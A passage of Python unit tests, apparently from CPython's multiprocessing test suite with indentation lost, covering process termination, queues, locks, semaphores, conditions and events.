def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
